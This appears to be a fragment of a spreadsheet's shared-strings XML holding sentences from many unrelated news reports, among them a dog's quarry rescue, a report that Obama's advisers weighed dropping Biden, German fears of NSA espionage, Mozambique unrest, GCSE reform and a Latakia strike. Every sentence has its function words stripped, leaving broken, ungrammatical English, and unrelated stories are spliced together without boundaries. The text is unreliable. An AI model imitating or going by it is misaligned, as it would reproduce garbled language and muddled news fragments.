    <t xml:space="preserve">15pm Wednesday , eagle-eyed dog walker spotted Ruby ledge quarry , stranded 50ft </t>
  </si>
  <si>
    <t xml:space="preserve"> A Technical Rescue Team Cleckheaton Fire Station rushed scene abseiled rescue Ruby used pet tube transport cliff </t>
  </si>
  <si>
    <t xml:space="preserve"> Specialist Technical Rescue Officer Andy Clayton said: &amp;apos; She precarious situation </t>
  </si>
  <si>
    <t xml:space="preserve"> She right middle cliff face - 50ft top bottom </t>
  </si>
  <si>
    <t xml:space="preserve"> She move muscle rescue - frozen solid </t>
  </si>
  <si>
    <t xml:space="preserve"> But fine </t>
  </si>
  <si>
    <t xml:space="preserve"> This unusual call-out </t>
  </si>
  <si>
    <t xml:space="preserve"> The fact dog spotted unbelievable </t>
  </si>
  <si>
    <t xml:space="preserve"> Specialist Technical Rescue Officer Peter Lau said: &amp;quot; Ruby lucky escape </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The potential could seriously injured worse </t>
  </si>
  <si>
    <t xml:space="preserve"> Ruby taken vets check-up found fine exhaustion dehydration </t>
  </si>
  <si>
    <t xml:space="preserve"> Miss Hall , Halifax , West Yorkshire , said: &amp;quot; Watching rescue terrifying </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I could believe first place </t>
  </si>
  <si>
    <t xml:space="preserve"> It amazing get back arms </t>
  </si>
  <si>
    <t xml:space="preserve"> The vet said became exhausted collapsed would probably fallen </t>
  </si>
  <si>
    <t xml:space="preserve"> The firefighters amazing </t>
  </si>
  <si>
    <t xml:space="preserve"> It really daring </t>
  </si>
  <si>
    <t xml:space="preserve"> We grateful every single one absolutely tremendous </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Alderson , Keighley , added: &amp;quot; We scared might fall stayed </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The firefighters brilliant </t>
  </si>
  <si>
    <t xml:space="preserve"> I &amp;apos;t believe </t>
  </si>
  <si>
    <t xml:space="preserve"> Report: Obama campaign considered dumping Biden Hillary Clinton President Barack Obama &amp;apos;s closest advisers secretly considered replacing Vice President Joe Biden Hillary Clinton 2012 ticket , according New York Times </t>
  </si>
  <si>
    <t xml:space="preserve"> The revelation notable bombshell Mark Halperin John Heilemann &amp;apos;s heavily anticipated 2012 campaign tome , &amp;quot; Double Down: Game Change 2012 </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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> The potential switch closely guarded secret within Chicago campaign infrastructure inside Oval Office </t>
  </si>
  <si>
    <t xml:space="preserve"> Only half dozen President &amp;apos;s closest advisers -- including Daley , former Obama campaign chief Jim Messina , former White House senior advisers David Axelrod David Plouffe -- knew change consideration </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Double Down &amp;quot; claims Daley spearheaded effort replace Biden , despite &amp;quot; close personal rapport , &amp;quot; ultimately deciding move data showed adding Clinton ticket &amp;apos;t &amp;quot; materially improve Obama &amp;apos;s odds </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; In interview Martin , Daley confirmed administration fact consider replacing Biden Clinton </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I vocal looking whole bunch things , one , &amp;quot; Daley told paper </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> &amp;quot; Campaigns &amp;apos;t spend kind money polling focus groups unless &amp;apos;re seriously considering something , &amp;quot; Martin said AC360 </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s unclear , however , whether Obama knew team exploring swap </t>
  </si>
  <si>
    <t xml:space="preserve"> Martin told CNN asked Daley whether then-boss knew potential shuffle </t>
  </si>
  <si>
    <t xml:space="preserve"> While Daley said &amp;apos;t think President &amp;quot; aware &amp;quot; potential change , former chief staff admitted &amp;apos;s &amp;quot; possible &amp;quot; Obama knew </t>
  </si>
  <si>
    <t xml:space="preserve"> Martin added &amp;quot; Double Down &amp;quot; definitively answer whether political probing reached Obama &amp;apos;s desk </t>
  </si>
  <si>
    <t xml:space="preserve"> Cooper asked Martin whether seriously thought Obama know research dumping Biden ticket </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Possibly , &amp;quot; Martin replied </t>
  </si>
  <si>
    <t xml:space="preserve"> A day thanks MGV (Male Choral Society) Dinker This year &amp;quot; Friedrich Wilhelm Dinker &amp;quot; MGV issued invitation 165th anniversary celebration , 52 guests , active singers wives happy accept </t>
  </si>
  <si>
    <t xml:space="preserve"> In clubhouse &amp;quot; Witteborg &amp;quot; Inn Dinker , present enjoyed friendly get-together name music </t>
  </si>
  <si>
    <t xml:space="preserve"> Traditionally , anniversary celebration also always fitting occasion bestow honours </t>
  </si>
  <si>
    <t xml:space="preserve"> This time around , secretary Rolf Wagener delighted receive special &amp;quot; Singer Year &amp;quot; award </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Not kept countless records us , also done much running around us , offer sincere thanks , &amp;quot; said Choir Chairman Erich Schlotmann </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Fifth place went Artur Brückner , responsible organising music copies </t>
  </si>
  <si>
    <t xml:space="preserve"> The Board Directors gave special thanks team managed innkeeper , Ange Pier-Ribbert , delighted present top class menu , Gerda Pier-Ribbert table decorations </t>
  </si>
  <si>
    <t xml:space="preserve"> The &amp;quot; Friedrich-Wilhelm &amp;quot; MGV meets regular choir rehearsals clubhouse every Tuesday 19: 45 </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; New voices love sing welcome time , &amp;quot; said Schlotmann </t>
  </si>
  <si>
    <t xml:space="preserve"> NSA revelations boost corporate paranoia state surveillance On mild day late August German police helicopter buzzed low US consulate Frankfurt , financial capital Germany </t>
  </si>
  <si>
    <t xml:space="preserve"> On instruction Office Protection Constitution (BfV), Germany &amp;apos;s domestic intelligence agency , mission photograph rooftop US outpost , located less 5km European Central Bank Bundesbank </t>
  </si>
  <si>
    <t xml:space="preserve"> German media say BfV hoped identify presence listening antennas action prompted exchange US German foreign ministry Berlin </t>
  </si>
  <si>
    <t xml:space="preserve"> James Clapper , US Director National Intelligence , insisted September US use foreign intelligence capabilities &amp;quot; steal trade secrets foreign companies behalf US companies enhance international competitiveness increase bottom line </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; But ever since Edward Snowden , contractor turned whistleblower , began releasing treasure trove US surveillance secrets , European governments business leaders longer sure whether take director word </t>
  </si>
  <si>
    <t xml:space="preserve"> Reports US National Security Agency spied Brazilian oil company Petrobras gained access data held US cloud providers including Google Yahoo ratcheted corporate paranoia state surveillance new highs </t>
  </si>
  <si>
    <t xml:space="preserve"> The final straw came revealed Chancellor Angela Merkel &amp;apos;s phone bugged , possibly decade </t>
  </si>
  <si>
    <t xml:space="preserve"> If Europe &amp;apos;s powerful person targeted , surely business leaders also potential targets </t>
  </si>
  <si>
    <t xml:space="preserve"> Snowden made transparent intensive collaboration US intelligence services companies </t>
  </si>
  <si>
    <t xml:space="preserve"> I think &amp;apos;s conceivable data used mutual benefit </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Germany must wake , &amp;quot; says Oliver Grün , president BITMi , represents small medium sized German IT companies </t>
  </si>
  <si>
    <t xml:space="preserve"> German companies believe US poses almost big risk China comes industrial espionage data theft , according survey published July EY , consultancy </t>
  </si>
  <si>
    <t xml:space="preserve"> In documentation leaked Mr Snowden , , however , evidence date US passed foreign companies &amp;apos; trade secrets companies </t>
  </si>
  <si>
    <t xml:space="preserve"> Politicians expressed concern EU lacks certain IT internet capabilities strive reduce dependence US </t>
  </si>
  <si>
    <t xml:space="preserve"> Business leaders sceptical </t>
  </si>
  <si>
    <t xml:space="preserve"> Someone German parliament says build German Google </t>
  </si>
  <si>
    <t xml:space="preserve"> I shut eyes slowly open </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; That &amp;apos;s way , &amp;quot; Hasso Plattner , chairman German business software company SAP , says </t>
  </si>
  <si>
    <t xml:space="preserve"> If one wanted strong European IT industry , one &amp;apos;t let die 20 years ago </t>
  </si>
  <si>
    <t xml:space="preserve"> Everything subsidised Germany , coal , cars farmers </t>
  </si>
  <si>
    <t xml:space="preserve"> Everything IT industry </t>
  </si>
  <si>
    <t xml:space="preserve"> Still , reach technical sophistication US spy agencies exposed Snowden revelations come shock companies previously thought biggest surveillance risk posed China </t>
  </si>
  <si>
    <t xml:space="preserve"> A big shift occurring cloud computing European executives become aware data stored US subject jurisdiction therefore potentially vulnerable </t>
  </si>
  <si>
    <t xml:space="preserve"> According survey carried Cloud Security Alliance , trade body , 10 per cent non-US members cancelled plans use US-based cloud provider revelations US Prism data mining programme </t>
  </si>
  <si>
    <t xml:space="preserve"> Jim Snabe , co-chief executive SAP , says: &amp;quot; We see new question customers &amp;apos;t come year ago - data stored guarantee stays physically jurisdiction </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Many German executives argue latest reports simply confirmation already knew: powerful states want steal prized secrets data must therefore guarded costs </t>
  </si>
  <si>
    <t xml:space="preserve"> That economic spying takes place surprise </t>
  </si>
  <si>
    <t xml:space="preserve"> It always taken place </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; This topic many years &amp;apos;t fundamentally changed current discussion , &amp;quot; says Kurt Bock , chief executive chemical maker BASF </t>
  </si>
  <si>
    <t xml:space="preserve"> The Americans spy us commercial industrial level spy , national interest defend businesses </t>
  </si>
  <si>
    <t xml:space="preserve"> Corporate leaders generally keen boast countermeasures taken , case hands advantage attacker </t>
  </si>
  <si>
    <t xml:space="preserve"> For large companies , message long since drummed home picking free USB stick trade fair , leaving laptop unguarded hotel room unwise , say least </t>
  </si>
  <si>
    <t xml:space="preserve"> Ulrich Hackenberg , board member carmaker Audi , says standard practice years mobile phones collected board meetings cannot used remote listening devices </t>
  </si>
  <si>
    <t xml:space="preserve"> Germany &amp;apos;s BfV advises executives consider using simple prepaid mobiles foreign trips risk smart phones compromised </t>
  </si>
  <si>
    <t xml:space="preserve"> The prepaid mobiles thrown away afterwards </t>
  </si>
  <si>
    <t xml:space="preserve"> However , concern small medium-sized companies remain vulnerable hacking surveillance </t>
  </si>
  <si>
    <t xml:space="preserve"> In Germany , many companies global market leaders particular niche </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Small medium sized companies often lack experience , personnel financial resources protect corporate secrets effectively unauthorised access , &amp;quot; BfV warns report </t>
  </si>
  <si>
    <t xml:space="preserve"> The US warns companies economic espionage countries </t>
  </si>
  <si>
    <t xml:space="preserve"> The US National Intelligence Estimate February named France alongside Russia Israel second tier offenders engage hacking economic intelligence , behind China , according The Washington Post </t>
  </si>
  <si>
    <t xml:space="preserve"> A board member German blue-chip company concurred comes economic espionage , &amp;quot; French worst </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Bernard Squarcini , former head French internal intelligence agency DCRI , quoted interview month saying: &amp;quot; The services know perfectly well countries , even co-operate antiterrorist fight , spy allies </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Gechingen: Absolute protection possible &amp;quot; We want involve residents planning early stage possible , &amp;quot; said Mayor Jens Häußler , opening citizen &amp;apos;s information event regarding flood protection concept Gechingen </t>
  </si>
  <si>
    <t xml:space="preserve"> Around 80 participants came Gemeindehalle (community hall) planned measures explained , express concerns submit ideas </t>
  </si>
  <si>
    <t xml:space="preserve"> Häußler made clear: &amp;quot; The final decisions made members Town Council &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Häußler commented flood found Gechingen unprepared 15 May 2009 , decisive event raising question protective measures future </t>
  </si>
  <si>
    <t xml:space="preserve"> A river basin study commissioned collaboration neighbouring community Aidlingen , forms basis flood protection concept Gechingen </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The goal protection many developed plots land possible , &amp;quot; said Häußler </t>
  </si>
  <si>
    <t xml:space="preserve"> The basis plans need protection expected floods , statistically occurs every 100 years , according German Weather Service </t>
  </si>
  <si>
    <t xml:space="preserve"> Climate change taken account form allowance 15 per cent </t>
  </si>
  <si>
    <t xml:space="preserve"> In expert circles referred &amp;quot; HQ 100aKlima &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> The masses water caused considerable damage Gechingen 2009 equivalent 1,000-year flood </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There thing absolute protection , attempt make relative improvement , &amp;quot; said Häußler </t>
  </si>
  <si>
    <t xml:space="preserve"> In order achieve HQ 100aKlima protection , around four million € must invested Gechingen , whereby town count State subsidy around 70 per cent </t>
  </si>
  <si>
    <t xml:space="preserve"> However , Häußler indicated funding would provided overall concept developed </t>
  </si>
  <si>
    <t xml:space="preserve"> In order develop concept , town reliant cooperation citizens </t>
  </si>
  <si>
    <t xml:space="preserve"> A complex planning approval procedure must completed </t>
  </si>
  <si>
    <t xml:space="preserve"> In best case scenario , implementation could begin 2016 </t>
  </si>
  <si>
    <t xml:space="preserve"> Among measures , protection concept , (we reported) already presented Town Council past week , plans local measures tributary River Irm , running Stammheim Valley </t>
  </si>
  <si>
    <t xml:space="preserve"> In conjunction presentation flood protection concept , participants made use opportunity submit concerns </t>
  </si>
  <si>
    <t xml:space="preserve"> Among others , question raised embankments detention reservoirs longer planned protect location </t>
  </si>
  <si>
    <t xml:space="preserve"> Gregor Kühn , technical planner commissioned engineering company , Hügelsheim-based &amp;apos; Wald und Corbe &amp;apos; , presented concept , emphasised required interplay proposed measures , order sum might achieve desired goal </t>
  </si>
  <si>
    <t xml:space="preserve"> Furthermore , economic solution must found , said Joachim Wald Wald und Corbe </t>
  </si>
  <si>
    <t xml:space="preserve"> There resentment among local residents old town , repeatedly suffer result overflowing canal network , even normal thunderstorms </t>
  </si>
  <si>
    <t xml:space="preserve"> The problem known administrative department initial measures already taken </t>
  </si>
  <si>
    <t xml:space="preserve"> However , Häußler indicated guidelines canal systems different flood protection , must confused </t>
  </si>
  <si>
    <t xml:space="preserve"> The town obliged design canal network way withstand rainfall events every two three years </t>
  </si>
  <si>
    <t xml:space="preserve"> To make sewerage channels wider would gobble millions </t>
  </si>
  <si>
    <t xml:space="preserve"> $ 325m rescue package Tassie health The Federal Government insists $ 325 million rescue package Tasmania &amp;apos;s ailing health system tough conditions attached ensure State Government &amp;apos;t waste funds </t>
  </si>
  <si>
    <t xml:space="preserve"> Federal Health Minister Tanya Plibersek announced Commonwealth taking &amp;quot; urgent action &amp;quot; head crisis caused island state &amp;apos;s aging population , higher rates chronic disease system constraints </t>
  </si>
  <si>
    <t xml:space="preserve"> The funding , four years , decided government consultations Tasmanian independent MP Andrew Wilkie </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The Government come emergency rescue package believe address unique challenges faced state , &amp;quot; Ms Plibersek said today </t>
  </si>
  <si>
    <t xml:space="preserve"> The $ 325 million package includes $ 31 million elective surgery blitz </t>
  </si>
  <si>
    <t xml:space="preserve"> An additional 2600 operations including orthopedic cataract surgery help clear backlog </t>
  </si>
  <si>
    <t xml:space="preserve"> There &amp;apos;s also money walk-in clinics Hobart Launceston , better after-hospital care , medical specialist training , mental health services rollout personal electronic health record systems local hospitals </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; These investments respond ideas front-line clinicians told best ways tend Tasmania &amp;apos;s health system , &amp;quot; Ms Plibersek said </t>
  </si>
  <si>
    <t xml:space="preserve"> The minister insisted Tasmanian Government would face strict reporting accountability regime </t>
  </si>
  <si>
    <t xml:space="preserve"> The state would maintain current funding levels order receive Commonwealth cash report monthly spending extra funds </t>
  </si>
  <si>
    <t xml:space="preserve"> A three-person commission set ensure state delivering services effectively efficiently possible </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Wilkie today said $ 325 million would count little &amp;quot; unless &amp;apos;s followed genuine reform put Tasmania &amp;apos;s public health system sustainable footing </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; He nevertheless praised Government responding request urgent assistance first raised Prime Minister beginning May </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I &amp;apos;m hopeful federal assistance package go long way towards taking state &amp;apos;s public health system critical list , &amp;quot; Mr Wilkie said </t>
  </si>
  <si>
    <t xml:space="preserve"> According State Government additional elective procedures largely reverse recent cuts </t>
  </si>
  <si>
    <t xml:space="preserve"> But federal Opposition health spokesman Peter Dutton believes today &amp;apos;s announcement &amp;quot; band-aid solution </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; &amp;quot; The reason Labor State Government ripped $ 430 million health system , &amp;quot; told ABC TV </t>
  </si>
  <si>
    <t xml:space="preserve"> You &amp;apos;t state government ripping almost half-a-billion dollars Commonwealth put $ 300 million pretend &amp;apos;s good news day </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Dutton called Ms Plibersek guarantee one dollar rescue package would spent additional bureaucracy </t>
  </si>
  <si>
    <t xml:space="preserve"> Mozambique security concerns mount powerful personalities clash With statue Samora Machel , Mozambique &amp;apos;s founding president , staring , thousands people gathered central Maputo chant peace slogans rare public demonstration </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We want peace back; want stability , &amp;quot; said Vanessa de Sousa , chief executive investment company </t>
  </si>
  <si>
    <t xml:space="preserve"> Fearful future country , swapped corporate attire T-shirt emblazoned &amp;quot; demand security &amp;quot; Portuguese joined crowds capital &amp;apos;s Independence Square Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> For two weeks , almost daily reports clashes government forces Renamo , worst skirmishes since peace deal 20 years ago </t>
  </si>
  <si>
    <t xml:space="preserve"> Renamo notorious rebel movement , initially backed white-ruled Rhodesia South Africa &amp;apos;s apartheid government part efforts destabilise country &amp;apos;s independent government </t>
  </si>
  <si>
    <t xml:space="preserve"> After 1992 peace deal , became opposition party </t>
  </si>
  <si>
    <t xml:space="preserve"> Analysts believe country unlikely slide back full-blown conflict , recent events unnerved foreign investors locals </t>
  </si>
  <si>
    <t xml:space="preserve"> The stakes high fast-growing economy discovery huge offshore gas reserves coal deposits northwest could bring $ 50bn investment next next years companies including Rio Tinto , Vale Brazil , Eni Italy Anadarko US </t>
  </si>
  <si>
    <t xml:space="preserve"> The ruling Frelimo party , dominant political force since 1975 , Renamo blame tension </t>
  </si>
  <si>
    <t xml:space="preserve"> Renamo says government initiated latest clashes launching attack members Sofala province , traditionally Renamo stronghold , October 17 </t>
  </si>
  <si>
    <t xml:space="preserve"> Assaults former rebels escalated government forces attacked Renamo bases attempted kill Afonso Dhlakama , group &amp;apos;s leader , Fernando Mazanga , Renamo &amp;apos;s spokesman , told Financial Times </t>
  </si>
  <si>
    <t xml:space="preserve"> The government blames Renamo triggering clashes , accusing attacking soldiers </t>
  </si>
  <si>
    <t xml:space="preserve"> President Armando Guebuza sought play concerns instability </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Guebuza told AFP , French news agency , Wednesday Mr Dhlakama saw &amp;quot; loser &amp;quot; wanted use &amp;quot; whatever remains forces try prove impose government decisions </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Both Frelimo Renamo insist want avoid war </t>
  </si>
  <si>
    <t xml:space="preserve"> But concerns grown Mr Mazanga quoted saying Renamo abandoning 1992 peace accord </t>
  </si>
  <si>
    <t xml:space="preserve"> He told FT meant agreement longer respected Frelimo </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Our vision come back negotiations , seriousness , &amp;quot; Mr Mazanga said </t>
  </si>
  <si>
    <t xml:space="preserve"> Previous talks parties done little ease tensions fuelled series clashes year </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It &amp;apos;s two big men (Guebuza Dhlakama) butting heads together , &amp;quot; said Joseph Hanlon , lecturer Open University Mozambique expert </t>
  </si>
  <si>
    <t xml:space="preserve"> Neither good negotiators neither prepared make kind concessions necessary </t>
  </si>
  <si>
    <t xml:space="preserve"> Renamo , pushing electoral reforms , already said would boycott municipal elections due November </t>
  </si>
  <si>
    <t xml:space="preserve"> Presidential parliamentary polls scheduled next year </t>
  </si>
  <si>
    <t xml:space="preserve"> Some commentators interpreted use force attempt ailing movement win concessions financial spoils government </t>
  </si>
  <si>
    <t xml:space="preserve"> Renamo &amp;apos;s share vote declining since 1992 , newer party , Democratic Movement Mozambique (MDM) formed former Renamo member , expected improve showing elections </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Mazanga says Mr Guebuza - due step second term ends next year - wants destroy country &amp;apos;s democracy </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; He want multi-party democracy , want transparent elections want peace want leave presidency , &amp;quot; Mr Mazanga said </t>
  </si>
  <si>
    <t xml:space="preserve"> It unclear much capacity Renamo , carried disruptive hit-and-run attacks police stations vehicles key north-south highway </t>
  </si>
  <si>
    <t xml:space="preserve"> Most skirmishes taken place Sofala province , several hundred kilometres north Maputo , hosts Beira , port miners , including Rio Tinto Vale , rely export coal </t>
  </si>
  <si>
    <t xml:space="preserve"> In June , Rio suspended use railway week Renamo threatened attack line </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Mazanga coy asked whether Renamo would repeat threat </t>
  </si>
  <si>
    <t xml:space="preserve"> Renamo wanted &amp;quot; warn international community things going well Mozambique , &amp;quot; Mr Mazanga said </t>
  </si>
  <si>
    <t xml:space="preserve"> The instability added frustrations government , says Fernando Lima , head Mediacoop , independent media company , many people also concerned corruption , slow pace development recent spate kidnappings </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; People think ones responsible future country government president , one find solutions problems , &amp;quot; says </t>
  </si>
  <si>
    <t xml:space="preserve"> Omar Sultuane , demonstrator , said people wanted stability </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; No one cares Renamo Frelimo , want peace , want free access roads , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> Schools urged focus maths , spelling grammar English literature courses require pupils study least one Shakespeare play , 19th century novel , Romantic poetry contemporary British fiction 1914 onwards </t>
  </si>
  <si>
    <t xml:space="preserve"> The exam also feature &amp;quot; unseen texts &amp;quot; encourage wider reading; A combined English literature language course scrapped </t>
  </si>
  <si>
    <t xml:space="preserve"> From 2015 , pupils required take standalone GCSE language , strong incentives choose English literature separate qualification </t>
  </si>
  <si>
    <t xml:space="preserve"> The Department Education due release new syllabuses English maths tomorrow - first subjects undergo radical overhaul </t>
  </si>
  <si>
    <t xml:space="preserve"> It make changes core subjects next year </t>
  </si>
  <si>
    <t xml:space="preserve"> In separate move , Ofqual , exams regulator , unveil shake-up structure GCSEs , new grading system less coursework </t>
  </si>
  <si>
    <t xml:space="preserve"> Speaking summer , Michael Gove , Education Secretary , said &amp;quot; widespread consensus need reform examination system restore public confidence , &amp;quot; insisting GCSEs would &amp;quot; challenging , ambitious rigorous </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Studies show English schools devote less time maths - 116 hours year three hours week term time - countries </t>
  </si>
  <si>
    <t xml:space="preserve"> By comparison , Australian schools provide average 143 hours year pupils around 138 hours Singapore </t>
  </si>
  <si>
    <t xml:space="preserve"> While formal requirement devote timetable maths , Coalition sources said extensive maths GCSE - combined weighting subject league tables - likely encourage schools provide extra teaching </t>
  </si>
  <si>
    <t xml:space="preserve"> The syllabus place greater focus &amp;quot; real world problems , &amp;quot; including financial mathematics </t>
  </si>
  <si>
    <t xml:space="preserve"> 2014 year celebration Geisingen The anniversary celebrations town Geisingen , mark 1,250th anniversary first documented mention town , drawing closer </t>
  </si>
  <si>
    <t xml:space="preserve"> When year comes end eight weeks , anniversary year upon us </t>
  </si>
  <si>
    <t xml:space="preserve"> Geisingen Kirchen-Hausen first documented together year 794 </t>
  </si>
  <si>
    <t xml:space="preserve"> A deed drafted Kirchen , towns mentioned </t>
  </si>
  <si>
    <t xml:space="preserve"> On 15 March , anniversary year officially launched , Geisingen currently suitable venues , launch event take place location two towns first documented 1,250 years ago , Kirchen-Hausen </t>
  </si>
  <si>
    <t xml:space="preserve"> As part anniversary celebrations , number events planned Geisingen Kirchen-Hausen </t>
  </si>
  <si>
    <t xml:space="preserve"> Kirchen-Hausen celebrate 1,250th anniversary celebratory weekend 18 20 July </t>
  </si>
  <si>
    <t xml:space="preserve"> On Friday ceremony , Saturday Sunday party held Kirchtalhalle </t>
  </si>
  <si>
    <t xml:space="preserve"> The Kirchen-Hausen Kirchenfest festival also held celebratory weekend </t>
  </si>
  <si>
    <t xml:space="preserve"> Town Musical Director , Rudolf Barth , composed commissioned piece town occasion anniversary , performed three dates </t>
  </si>
  <si>
    <t xml:space="preserve"> On 21 June , conjunction Schwarzwaldverein &amp;#91; Black Forest Association &amp;#93; Mid-Summer Festival , 12 July Arena , accompanied fireworks , 13 December first concert put Stadtmusik (Town Musical Society) new Festival Hall </t>
  </si>
  <si>
    <t xml:space="preserve"> This venue completed inaugurated anniversary year , official date set last weekend September , 27 28 September </t>
  </si>
  <si>
    <t xml:space="preserve"> On occasion Geisingen town anniversary , new chronicle also published </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; However , merely chronicle Geisingen , rather printed work Geisingen today , consists Geisingen , Kirchen-Hausen , Leipferdingen , Aulfingen Gutmadingen , &amp;quot; said Mayor Walter Hengstler </t>
  </si>
  <si>
    <t xml:space="preserve"> And Geisingen today also celebrating birthday 2014 , 1974 incorporations form current region completed </t>
  </si>
  <si>
    <t xml:space="preserve"> The new chronicle presented 21 22 November new Festival Hall Geisingen </t>
  </si>
  <si>
    <t xml:space="preserve"> However , 2014 also year many anniversaries respects </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> The Leipferdingen Nursing Home turn 40 years old , Geisingen School new location 50 years celebrating 10 May , Polyhymnia Leipferdingen music association turn 150 years old celebrating part Brunnenfest &amp;#91; Fountain Festival &amp;#93; 4 7 July </t>
  </si>
  <si>
    <t xml:space="preserve"> The town Geisingen first officially documented year 764 , deed donation , possession St</t>
  </si>
  <si>
    <t xml:space="preserve"> Gallen Monastery </t>
  </si>
  <si>
    <t xml:space="preserve"> The deed drawn Kirchen (Hausen), time location courthouse </t>
  </si>
  <si>
    <t xml:space="preserve"> Both communities thus mentioned deed </t>
  </si>
  <si>
    <t xml:space="preserve"> One reason choosing 2014 celebrate 1,250-year anniversary way , also coincides 40th anniversary Community Reform (Gemeindereform)</t>
  </si>
  <si>
    <t xml:space="preserve"> Supreme Court upholds Obama health care law In major victory Obama administration , US Supreme Court today ruled Barack Obama &amp;apos;s signature health care law constitutional </t>
  </si>
  <si>
    <t xml:space="preserve"> By 5-4 vote , justices ruled Patient Protection Affordable Care Act &amp;apos;s individual mandate - requires citizens buy health insurance 2014 else pay penalty - constitutional taxing power government </t>
  </si>
  <si>
    <t xml:space="preserve"> Chief Justice John Roberts sided four liberal members court Justices Scalia , Thomas , Alito Kennedy dissented </t>
  </si>
  <si>
    <t xml:space="preserve"> The court also upheld remaining sections 2700 page law , held health care law &amp;apos;s requirement states increase Medicaid eligibility else lose federal Medicaid funding unconstitutionally coercive </t>
  </si>
  <si>
    <t xml:space="preserve"> The suit block law brought 26 states National Federation Independent Business </t>
  </si>
  <si>
    <t xml:space="preserve"> The law vigorously opposed major Republican presidential candidates 2012 primary season , including presumptive nominee Mitt Romney </t>
  </si>
  <si>
    <t xml:space="preserve"> Thought travel agents thing past thanks internet ? Flight Centre seem bucking trend </t>
  </si>
  <si>
    <t xml:space="preserve"> The company upgraded full year profit forecast looking record earnings holidaymakers Australia United Kingdom </t>
  </si>
  <si>
    <t xml:space="preserve"> The travel company expects full year underlying profit tax $ 325 million $ 340 million , compared $ 305 million $ 315 million previously forecast </t>
  </si>
  <si>
    <t xml:space="preserve"> If current guidance achieved represent 12 17 per cent growth record $ 290</t>
  </si>
  <si>
    <t xml:space="preserve">4 million profit achieved 2011 / 12 </t>
  </si>
  <si>
    <t xml:space="preserve"> Managing director Graham Turner said Flight Centre made 8 per cent profit first half started second half strongly especially Australian UK non-business travel </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Year-to-date , 10 countries profitable several track record full-year earnings interest tax contributions , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> This includes Australia United Kingdom , typically largest profit generators </t>
  </si>
  <si>
    <t xml:space="preserve"> In Australia leisure business rebounded second half offset slightly weaker domestic corporate travel market </t>
  </si>
  <si>
    <t xml:space="preserve"> Similarly UK , Flight Centre &amp;apos;s leisure business performed well corporate clients spending less </t>
  </si>
  <si>
    <t xml:space="preserve"> Its US business recovered losses seasonally weaker first half expected deliver third consecutive full year profit </t>
  </si>
  <si>
    <t xml:space="preserve"> Flight Centre shares 3c $ 38</t>
  </si>
  <si>
    <t xml:space="preserve">20 yesterday </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> The target &amp;quot; missiles related equipment &amp;quot; , Israeli government feared intended Lebanese Hezbollah , according CNN </t>
  </si>
  <si>
    <t xml:space="preserve"> The Syrian Lebanese media , well Arabic broadcaster Al-Arabiya , previously reported base port town Latakia fired upon night Wednesday Thursday , Israelis identified responsible party </t>
  </si>
  <si>
    <t xml:space="preserve"> Israeli television broadcaster Channel 2 showed satellite images base Latakia , Russian S-125 Newa-type defence missiles battery SA-3 missiles could seen , according Channel 2 range 35 kilometres transport warheads weighing 70 kilograms </t>
  </si>
  <si>
    <t xml:space="preserve"> Unsure , government Jerusalem officially confirmed attack </t>
  </si>
  <si>
    <t xml:space="preserve"> However , press agency Reuters also quoted anonymous Israeli government official saying believed Israel carried attack , sure </t>
  </si>
  <si>
    <t xml:space="preserve"> In case , spokesperson Israeli Ministry Defence said: &amp;quot; We commenting reports &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Journalist Ron Ben-Yishai , writing daily newspaper Yedioth Ahronoth , emphasised Syrian regime already previously attempted , cases successfully , deliver ground air missiles Hezbollah </t>
  </si>
  <si>
